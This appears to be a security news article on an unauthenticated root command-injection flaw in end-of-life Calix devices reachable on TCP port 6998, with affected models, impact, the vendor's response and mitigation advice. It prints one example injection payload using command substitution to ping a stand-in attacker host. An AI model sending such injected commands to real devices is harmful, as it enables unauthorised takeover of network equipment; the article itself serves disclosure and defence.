A significant security vulnerability has been identified in certain legacy Calix networking devices, enabling unauthenticated attackers to execute arbitrary code with root privileges. This flaw resides in the devices’ implementation of the CPE WAN Management Protocol (CWMP) on TCP port 6998.
Vulnerability Details
The core issue stems from inadequate input validation within the TR-069 protocol used by these devices. When an attacker connects to TCP port 6998, the device presents a command prompt. By inputting commands encapsulated with special characters like backticks (`) or using command substitution syntax ($()), the attacker can execute system commands at the highest privilege level.
For instance, an attacker could input:
“`
$(ping -c 4 attacker-controlled-ip)
“`
This command would instruct the device to send four ICMP echo requests to a specified IP address, confirming the attacker’s ability to execute commands remotely.
Affected Devices
The vulnerability specifically impacts the following end-of-life (EOL) Calix hardware models:
– 812Gv2
– 813Gv2
– 813Gv2-2
– 5VT devices developed by third parties under Calix branding
Additionally, various rebranded devices may be affected, though a comprehensive list is not available. Notably, Calix’s current-generation Gigacenter devices are confirmed to be unaffected, as they do not have a locally accessible CWMP (TR-069) service running.
Potential Impact
Exploitation of this vulnerability requires no authentication, making it particularly dangerous. Attackers could leverage this flaw to:
– Establish persistent backdoors
– Exfiltrate sensitive data
– Use the compromised device as a launchpad for further network penetration
Given the root-level access granted, the potential for damage is substantial.
Historical Context
This is not the first significant security issue affecting Calix hardware. In 2022, researchers documented an attack where threat actors exploited GigaCenter devices to install SOCKS proxy servers on port 8111, leading to service degradation and necessitating device reboots to mitigate the issue.
Calix’s Response
Calix has acknowledged the vulnerability, stating:
As the only devices with this vulnerability present appear to be these EOL rebranded systems, we will be closing this issue out. We will create an advisory for our customers who are still deploying these unsupported CPEs.
Given that the affected devices are end-of-life, patches are unlikely to be released.
Recommended Mitigation Steps
Security experts recommend the following actions to mitigate the risk:
1. Identify and Decommission Vulnerable Devices: Conduct a thorough audit to locate and replace any affected hardware.
2. Block Access to Port 6998: Implement network access control lists to prevent access to TCP port 6998.
3. Isolate Legacy Hardware: Ensure that any remaining legacy devices are segregated from critical network segments to limit potential exposure.
4. Implement Network Segmentation: Design the network architecture to contain potential compromises, preventing lateral movement by attackers.
Network administrators managing Calix infrastructure should prioritize these steps to protect against this easily exploitable remote code execution vulnerability.
